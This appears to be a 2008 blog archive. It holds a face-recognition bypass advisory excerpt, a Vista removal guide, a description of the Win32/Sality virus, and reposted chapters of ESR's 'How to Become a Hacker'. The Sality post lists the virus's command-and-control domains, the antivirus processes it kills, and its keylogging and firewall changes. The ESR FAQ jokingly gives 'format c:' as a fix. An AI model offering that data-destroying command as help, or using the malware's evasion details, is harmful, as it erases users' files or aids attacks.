In order to make use of this technology, a laptop's owner uses webcam to capture his or her face at a close distance and at different viewpoints. This step helps the laptop to "remember" facial characteristics of its owner, and store these data in the face database. Bkis's research, however, show that an unauthorized person can easily regenerate suite of fake face recognition to bypass the authentication mechanism.

Performing tests on laptops with 1.3 Megapixel camera produced by Lenovo - Asus - Toshiba, using the Bypass Model above with special photos or videos of some users, we have been able to pass the User Authentication Based on Face Recognition and log into user accounts on Windows Vista without difficulty.

All the applications tested are of their latest versions and are set to Highest Security Level.
- Lenovo Veriface III
- Asus SmartLogon V1.0.0005
- Toshiba Face Recognition 2.0.2.32
3. Solution
In the mean time waiting for this vulnerability to be fixed, Bkis recommends that users all over the world stop using face authentication to log in their laptops.
Credit
Thanks Le Nhat Minh, Nguyen Minh Duc, Bui Quang Minh, Le Minh Hung.
----------------------------------------
------------------------
Security Vulnerability Research Team (SVRT-Bkis)
Bach Khoa Internetwork Security Center (Bkis)
Hanoi University of Technology (Vietnam)
Office: 5th Floor, Hitech building - 1A Dai Co Viet, Hanoi, Vietnam
Tel: 84.4.38 68 47 57 Ext 128
Mobile: +84 983 60 99 20
Email: svrt@bkav.com.vn
Website: www.bkav.com.vn

how to remove vista

2008-12-09T20:18:00.005+05:30
So you bought a copy of vista and installed in your computer removing your old xp?
For the first few days you play with the newly installed os then you finally decide to hate the much hyped "windows vista".Now you want to remove vista and get back to reliable XP but it isnt that easy.It seems as if there is no way to do so.So you try to google around with tags "how to remove vista" and "how to uninstall vista" ending up with process which seems too complicated for end users.

There for i am listing here the procedure to remove VISTA and back to XP in easy simple steps which any one can follow.
what you need?
1-windows vista bootable dvd
2-windows xp bootable cd
3-Dvds to backup your data(optional)
step-1
First step is to back all your data in the drive which your vista is installed.You can do this using dvds external storage devices or even moving the data to other device its up to you.This step is optional you can skip this and directly goto step 2.But remember you will never be able to get the data back as we will format the drive in the following steps.
step-2
Insert the windows vista dvd and restart your computer and boot from the dvd.(press F11 during boot to give preference to your dvd drive over your hard drive).Now windows file will start loading.Let it load and follow the instruction until you get a screen which lists all your drives and asks to select a drive to install vista into.select the advanced option and delete the drive in whcih vista is installed(usually c).Then remove the dvd.
Step-3
Insert the XP cd into the drive and boot from it.Now select to create a new drive from the free space available from the deletion of the drive in whcih vista was installed.And install XP into it as usual.

win32:sality Virus

2008-12-06T22:18:00.004+05:30
I was playing with a few soft wares when my avast antivirus warned me of this "win32:sality virus".As usual i neglected it.This was a big mistake i made.Two hours later my antivirus declared VLC as virus, 4 hours later notepad was declared as virus and 24 hours later almost all exes were declared as virus. Many programs terminated abnormally.

I started searching net for information on this virus.When i got the following info about it:-
Characteristics
Type : Virus
Category : Win32
Also known as: W32.HLLP.Sality (Symantec)

Description
Win32/Sality is a polymorphic virus that infects Win32 PE executable files. It also contains trojan components. Win32/Sality has been known to be downloaded by variants of the Win32/Bagle family.
Method of Infection
When an infected file is executed the virus decrypts itself and drops a DLL file into the %System% directory. The DLL file is injected into other running processes. The virus then executes the host program code.
Some examples of the names used by the Sality DLL file as reported to CA from the wild include the following:
%System%\syslib32.dll
%System%\oledsp32.dll
%System%\olemdb32.dll
%System%\wcimgr32.dll
%System%\wmimgr32.dll
Note: '%System%' is a variable location. The malware determines the location of the current System folder by querying the operating system. The default installation location for the System directory for Windows 2000 and NT is C:\Winnt\System32; for 95,98 and ME is C:\Windows\System; and for XP is C:\Windows\System32.
Many variants of Sality also attempt to infect executable files referenced by values in the following registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\Run
This enables the virus to run at each Windows start.
Method of Distribution
Via File Infection
Sality searches local drives C:\ to Y:\ for Windows PE executable files to infect. Some variants do not infect files with a file size below 4K bytes or above 20M bytes. The virus replaces code at the entry point of the executable with its own code, and appends an encrypted copy of itself to the host file, which increases the size of the infected program. When the file is executed the virus extracts and runs the appended code, and then runs the host program code to hide its presence.
Via Network Shares
Sality enumerates shares on the network, and then searches located shares for Windows PE executable files in the same way as outlined above on local drives.
Payload
Steals System Information
Some Sality variants collect information about the infected system and e-mail this information to the domain mail.ru.
The information sent includes, but is not limited to, the following:
OS version
IP address
Computer name
Recent URLs visited
Passwords
ISP Dial up Connection details and Password
Downloads and Executes Arbitrary Files
Sality variants contact certain domains which provide instructions to download and execute files, some of the domains contacted are listed below:
hut2.ruinvis1blearm
3333.comegozdq.com
5558x7.comwtcvxu.com
fdpgb3.combpfq02.com
u7zywp.com
zvco6m.com
qiredremer.biz
sbapodremer.biz
pgpwdremer.biz
gogcojdremer.biz
rus0396kuku.com
vrrnscdremer.biz
connect2me.org
The files downloaded may be used to give a remote unauthorized user extended control of the affected machine. Sality may also download variants of other malware such as Win32/Onecooked.
Sality also uses this method to download updated versions of itself.
Deletes files
Sality searches subdirectories on drives C:\ to Y:\ for files with the following extensions:
.vdb.avc
Files located are deleted. This is presumably to disable or impair certain AV products.
Terminates Processes
Sality searches for and terminates any processes which match a list contained in its code; the following is an example of such a list:
AVXQUAR
ICSUPP
ICSSUPPNT
ESCANH
AVLTMAIN
VSMAIN
TRJSCAN
PROTECTX
PORTDETECTIVE
PINGSCAN
PERISCOPE
NPFMESSENGER
MCAGENT
LOCKDOWN
DRWTSN32
DRWATSON
CLEANER
BLACKICE
BIPCP
BIDSERVER
BIDEF
AVPROTECT
AVGSERV
ATGUARD
AVSYNMGR
AUTOTRACE
SAVSCAN
RTVSCAN
NUPGRADE
NPROTECT
MGUI
MCUPDATE
NMAIN
ANTI
NOD32
ZONEALARM
OUTPOST
DRWEB
KAV
AVP
NAV
When a processes is terminated Sality displays an error message to indicate a fake error condition.
Logs Keystrokes
Some Sality variants log the affected user's keystrokes to a file in the %System% directory. The file name is prefixed with "win" followed by random characters, for example:
%System%\WINFIGBO.BGO
The location of this file is e-mailed to the mail.ru domain.
Changes Firewall Settings
Some Sality trojan components modify the Windows Firewall settings to add themselves as authorized applications. IT was with a name of "ipsec" in my case.This effectively allows these components to bypass the firewall.In my case my firewall was repeatedly turned off by the virus.
HTTP Proxy
Some Sality variants run an HTTP proxy on port 80 of the affected machine. The trojan contacts the domain shared-admin.com, and receives instructions to connect to the domain connect2me.org, which then returns an IP address. All requests sent to the proxy running on the affected machine are forwarded to the previously returned IP address.
Displays Message
Some Sality variants check if the Date is the 10th of October and may display an alarmist message if the hour and the minute have the same value, for example 21:21. Please see below for an example of the message:
"Hey, Lamer! Say "Bye-bye" to your data!"
After reading it i realised that on how big trouble i have put myself into.I immediately tried my best to remove it:-
i)system restore:-didn't work soon it was also infected with the virus
ii)manually searched for possible dlls:-nothing was found
iii)tried sality remover from avg-no use (Still Try it)
iv)tried safe mode:-it didn't boot in safe mode

Finally i had to format my system. So if you get any indication that any software is infected with this virus do not install it.There is no way out once your system gets infected with it.So be careful.
Note:-This virus has a special property of hiding in disk partitons. So if you finally decide to format your pc then first delete all drives and then recreate them during installation.

remove virus,antivirus,win32 sality remover,how to remove win32 sality virus.

How to become a hacker-ch 4

2008-11-21T23:09:00.006+05:30

chapter-4

Table of contents

Points For Style

Other Resources

Frequently Asked Questions

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

· Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

· Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

· Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.

· Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.

· Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

· Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

· Don't use a silly, grandiose user ID or screen name.

· Don't get in flame wars on Usenet (or anywhere else).

· Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.

· Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.

There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.

Rick Moen has written an excellent document on how to run a Linux user group.

Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.

If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.

When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.

If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.

Frequently Asked Questions
Q:Which are the best hacking tools?
A:Google,Wiki and your brain.

Q:

How do I tell if I am already a hacker?

A:

Ask yourself the following three questions:

· Do you speak code, fluently?

· Do you identify with the goals and values of the hacker community?

· Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.

The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.

The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That's the inward half; the other, outward half is the degree to which you identify with the hacker community's long-term projects.

Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?

But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off "intellectual-property" power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we've learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they've missed the point. The right response is probably “Shut up and show them the code.”

The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts.

Sociologists, who study networks like those of the hacker culture under the general rubric of "invisible colleges", have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the "invisible college" that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.

Q:

Will you teach me how to hack?

A:

Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.

Q:

How can I get started, then?

A:

The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q:

When do you have to start? Is it too late for me to learn?

A:

Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q:

How long will it take me to learn to hack?

A:

That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q:

Is Visual Basic a good language to start with?

A:

If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. Don't go there. It's ugly, and it never stops being ugly.

There is a specific problem with Visual Basic; mainly that it's not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don't cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use — more careful than any newbie is really capable of being — you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available. Python, for example.

Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.

One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in.

Q:

Would you help me to crack a system, or teach me how to crack?

A:

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q:

How can I get the password for someone else's account?

A:

This is cracking. Go away, idiot.

Q:

How can I break into/read/monitor someone else's email?

A:

This is cracking. Get lost, moron.

Q:

How can I steal channel op privileges on IRC?

A:

This is cracking. Begone, cretin.

Q:

I've been cracked. Will you help me fend off further attacks?

A:

No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.

Q:

I'm having problems with my Windows software. Will you help me?

A:

Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes.

Q:

Where can I find some real hackers to talk with?

A:

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q:

Can you recommend useful books about hacking-related subjects?

A:

I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.

For an introduction to Python, see the introductory materials on the Python site.

Q:

Do I need to be good at math to become a hacker?

A:

No. Hacking uses very little formal mathematics or arithmetic. In particular, you won't usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful.

Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won't help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you'd better grow it.

I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan's book What Is The Name Of This Book?. Smullyan's playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.

Q:

What language should I learn first?

A:

XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.

But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed.

C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.

Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.

Q:

What kind of hardware do I need?

A:

It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.

The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won't work with Linux.

There's a FAQ on hardware compatibility; the latest version is here.

Q:

I want to contribute. Can you help me pick a problem to work on?

A:

No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works.

Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think "Cool! I'd like to work on that!", join it.

Q:

Do I need to hate and bash Microsoft?

A:

No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.

Q:

But won't open-source software leave programmers unable to make a living?

A:

This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q:

Where can I get a free Unix?

A:

If you don't have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...

----------------------------thread ends--------------------------------
chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

How to become a hacker-ch 3

2008-11-21T00:21:00.002+05:30
Chapter-3

Table of Contents

Status in the Hacker Culture

1. Write open-source software

2. Help test and debug open-source software

3. Publish useful information

4. Help keep the infrastructure working

5. Serve the hacker culture itself

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.
chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

How to become a hacker-ch 2

2008-11-21T00:13:00.008+05:30

Chapter-2

Table of Contents
Basic Hacking Skills
1. Learn how to program.

2. Get one of the open-source Unixes and learn to use and run it.

3. Learn how to use the World Wide Web and write HTML.

4. If you don't have functional English, learn it.

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)

It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

But be aware that you won't reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.

Under Mac OS X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.

During the first ten years of this HOWTO's life, I reported that from a new user's point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.

You can find BSD Unix help and resources at www.bsd.org.

A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it's a way to get a look at the possibilities without having to do anything drastic.

I have written a primer on the basics of Unix and the Internet.

I used to recommend against installing either Linux or BSD as a solo project if you're a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user's group and asking for help. It can't hurt, and may smooth the process.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

